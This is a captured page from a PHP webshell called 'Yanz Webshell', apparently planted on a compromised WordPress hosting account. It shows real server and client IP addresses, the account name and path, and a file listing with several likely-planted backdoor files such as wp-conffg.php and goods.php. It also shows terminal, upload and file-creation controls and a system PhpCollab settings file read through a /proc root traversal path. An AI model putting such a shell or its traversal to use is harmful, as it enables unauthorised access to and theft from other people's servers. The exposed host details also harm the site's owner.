Attention:
Uname:
Php:
Hdd:
Cwd:
Yanz Webshell! - PRIV8 WEB SHELL ORB YANZ BYPASS!
Linux server234.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
8.3.30 Safe mode: OFF Datetime: 2026-05-05 04:37:16
3907.15 GB Free: 1074.75 GB (27%)
/home/repauqkb/public_html/ drwxr-x--- [ root ] [ home ] Text

Server IP:
198.54.116.179
Client IP:
216.73.216.147
[ Files ][ Logout ]

File manager

NameSizeModifyPermissionsActions
[ . ]dir2026-05-05 02:30:18drwxr-x---Rename Touch
[ .. ]dir2025-04-18 09:10:57drwx--x--xRename Touch
[ wp-admin ]dir2026-05-05 01:36:32drwxr-xr-xRename Touch
[ wp-content ]dir2026-05-05 01:36:33drwxr-x---Rename Touch
[ wp-includes ]dir2026-05-05 01:36:38drwxr-xr-xRename Touch
.hcflag31 B2026-05-05 02:30:18-rw-r--r--Rename Touch Edit Download
.htaccess626 B2026-05-05 01:36:36-r--r--r--Rename Touch Edit Download
.htaccess.bk243 B2026-04-28 01:30:21-rw-r--r--Rename Touch Edit Download
.litespeed_flag297 B2026-05-05 01:36:06-rw-r--r--Rename Touch Edit Download
error_log4.41 MB2026-05-05 04:37:15-rw-r--r--Rename Touch Edit Download
goods.php173.77 KB2026-05-05 01:13:55-rw-r--r--Rename Touch Edit Download
index.php16.36 KB2026-05-05 01:36:36-r--r--r--Rename Touch Edit Download
license.txt19.44 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
options-privacy-more.php768 B2025-06-24 17:01:07-rw-r--r--Rename Touch Edit Download
qinfofuns.php12.90 KB2026-04-23 18:25:11-rw-r--r--Rename Touch Edit Download
readme.html7.25 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-activate.php7.18 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-blog-header.php351 B2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-comments-post.php2.27 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-conffg.php122.70 KB2026-05-05 01:13:55-rw-r--r--Rename Touch Edit Download
wp-config-sample.php3.26 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-config.php3.55 KB2026-03-27 14:45:59-rw-r--r--Rename Touch Edit Download
wp-cron.php5.49 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-links-opml.php2.43 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-load.php3.84 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-login.php50.23 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-mail.php8.52 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-settings.php30.33 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-signup.php33.71 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-trackback.php5.09 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wper.php16.31 KB2026-01-27 01:19:39-rw-r--r--Rename Touch Edit Download
xmlrpc.php3.13 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
yeni.php27.21 KB2026-04-23 17:49:33-rw-r--r--Rename Touch Edit Download
 
Change dir:
Read file:
Make dir: (Writeable)
Make file: (Writeable)
Terminal:
Upload file: (Writeable)

HEX
HEX
Server: LiteSpeed
System: Linux server234.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User: repauqkb (12019)
PHP: 8.3.30
Disabled: NONE
Upload Files
File: //proc/thread-self/root/var/softaculous/phpcol/settings.php
<?php
/*
 * Application name: PhpCollab
 * Path by root: ../includes/settings.php
 *
 * File auto-generated @ 2021-10-11 05:34am
 *
 * For more information about this file, visit:
 * https://github.com/phpcollab/phpcollab/wiki/Settings
 *
 */

# PhpCollab version
$version = "2.10.3";

# installation type
# Options: (default) online | offline
$installationType = "online";

# select database application
# Options: mysql | postgresql | sqlserver
$databaseType = "mysql";

# database parameters
define("MYSERVER", "[[softdbhost]]");
define("MYLOGIN", "[[softdbuser]]");
define("MYPASSWORD", "[[softdbpass]]");
define("MYDATABASE", "[[softdb]]");

# notification method
# Option: (default) mail | smtp
$notificationMethod = "mail";

# smtp parameters
if ($notificationMethod === "smtp") {
    define("SMTPSERVER", "");
    define("SMTPLOGIN", "");
    define("SMTPPASSWORD", "");
    define("SMTPPORT", "");
}

# create folder method
# Options: (default) PHP | FTP
$mkdirMethod = "PHP";

# ftp parameters
# note: only needed if the mkdirMethod is set to FTP
if ($mkdirMethod === "FTP") {
    # PhpCollab root according to ftp account
    # note: No slash at the end
    $ftpRoot = "";

    define("FTPSERVER", "");
    define("FTPLOGIN", "");
    define("FTPPASSWORD", "");
}

# Invoicing module
$enableInvoicing = false;

# theme choice
define("THEME", "default");

# newsdesk limiter
$newsdesklimit = true;

# if 1 the admin logs in his homepage
$adminathome = false;

# timezone GMT management
$gmtTimezone = false;

# language choice
# (default) en
$langDefault = "[[language]]";

# Mantis bug tracking parameters
$enableMantis = false;

if ($enableMantis === true) {
    # Mantis installation directory
    # note: add a slash at the end
    $pathMantis = "";
}

# https related parameters
$pathToOpenssl = "/usr/bin/openssl";

# login method, set to "CRYPT"
# Options: (default) crypt | plain | md5
# It is highly recommended to NOT use MD5 or PLAIN
$loginMethod = "crypt";

# enable LDAP
$useLDAP = false;
if ($useLDAP) {
    $configLDAP["ldapserver"] = "";
    $configLDAP["searchroot"] = "";
}

# htaccess parameters
$htaccessAuth = false;
if ($htaccessAuth) {
    # note: no slash at the end
    $fullPath = "";
}

# file management parameters
$fileManagement = true;

# Size in bytes for uploads
# Default is 10Mb
$maxFileSize = 10485760;

# Root Path
# note: no slash at the end
$root = "[[softurl]]";

# security issue to disallow php files upload
$allowPhp = false;

# project site creation
$sitePublish = true;

# enable update checker
# (default) true
$updateChecker = true;

# e-mail notifications
# (default) true
$notifications = true;

# show peer review area
$peerReview = true;

# show items for home
$showHomeBookmarks = true;
$showHomeProjects = true;
$showHomeTasks = true;
$showHomeSubtasks = true;
$showHomeDiscussions = true;
$showHomeReports = true;
$showHomeNotes = true;
$showHomeNewsdesk = true;

# security issue to disallow auto-login from external link
$forcedLogin = false;

# table prefix
$tablePrefix = "[[dbprefix]]";

# database tables
$tableCollab["assignments"] = "[[dbprefix]]assignments";
$tableCollab["calendar"] = "[[dbprefix]]calendar";
$tableCollab["files"] = "[[dbprefix]]files";
$tableCollab["logs"] = "[[dbprefix]]logs";
$tableCollab["members"] = "[[dbprefix]]members";
$tableCollab["notes"] = "[[dbprefix]]notes";
$tableCollab["notifications"] = "[[dbprefix]]notifications";
$tableCollab["organizations"] = "[[dbprefix]]organizations";
$tableCollab["posts"] = "[[dbprefix]]posts";
$tableCollab["projects"] = "[[dbprefix]]projects";
$tableCollab["reports"] = "[[dbprefix]]reports";
$tableCollab["sorting"] = "[[dbprefix]]sorting";
$tableCollab["tasks"] = "[[dbprefix]]tasks";
$tableCollab["teams"] = "[[dbprefix]]teams";
$tableCollab["topics"] = "[[dbprefix]]topics";
$tableCollab["phases"] = "[[dbprefix]]phases";
$tableCollab["support_requests"] = "[[dbprefix]]support_requests";
$tableCollab["support_posts"] = "[[dbprefix]]support_posts";
$tableCollab["subtasks"] = "[[dbprefix]]subtasks";
$tableCollab["updates"] = "[[dbprefix]]updates";
$tableCollab["bookmarks"] = "[[dbprefix]]bookmarks";
$tableCollab["bookmarks_categories"] = "[[dbprefix]]bookmarks_categories";
$tableCollab["invoices"] = "[[dbprefix]]invoices";
$tableCollab["invoices_items"] = "[[dbprefix]]invoices_items";
$tableCollab["services"] = "[[dbprefix]]services";
$tableCollab["newsdeskcomments"] = "[[dbprefix]]newsdeskcomments";
$tableCollab["newsdeskposts"] = "[[dbprefix]]newsdeskposts";

# demo mode parameters
$demoMode = false;
$urlContact = "https://www.sourceforge.net/projects/phpcollab";

# Gantt graphs
$activeJpgraph = true;

# filter to see only logged user clients (in team / owner)
$clientsFilter = true;

# filter to see only logged user projects (in team / owner)
$projectsFilter = true;

# Enable help center support requests
$enableHelpSupport = true;

# Return email address given for clients to respond too.
$supportEmail = "";

# Support Type
# Options: (default) team | admin
# If team is selected, a notification will be sent to everyone in the team when a new request is added
$supportType = "team";

# enable the redirection to the last visited page, EXPERIMENTAL DO NOT USE IT
$lastvisitedpage = false;

# auto-publish tasks added from client site?
$autoPublishTasks = false;

# html header parameters
$setTitle = "phpCollab";
$siteTitle = "phpCollab";
$setDescription = "Groupware module. Manage web projects with team collaboration, users management, tasks and projects tracking, files approval tracking, project sites clients access, customer relationship management (Php / Mysql, PostgreSQL or Sql Server).";
$setKeywords = "PhpCollab, phpcollab.com, Sourceforge, management, web, projects, tasks, organizations, reports, Php, MySql, Sql Server, mssql, Microsoft Sql Server, PostgreSQL, module, application, module, file management, project site, team collaboration, free, crm, CRM, cutomer relationship management, workflow, workgroup";

# Email alerts
$emailAlerts = false;

/**
 * Authentication Settings
 */
$resetPasswordTimes = [
    'tokenLifespan' => 60,
    'timeBetweenAttempts' => 15,
    'attemptLimit' => 3
];

/**
 * Debugging Settings.
 * DO NOT Change these on a Production server unless you know what you are doing.
 * Refer to: https://phpcollab.com/debugging for more information
 */

# enable development bar in footer
$footerDev = false;

$logLevel = 400;

$uuid = "[[uuid]]";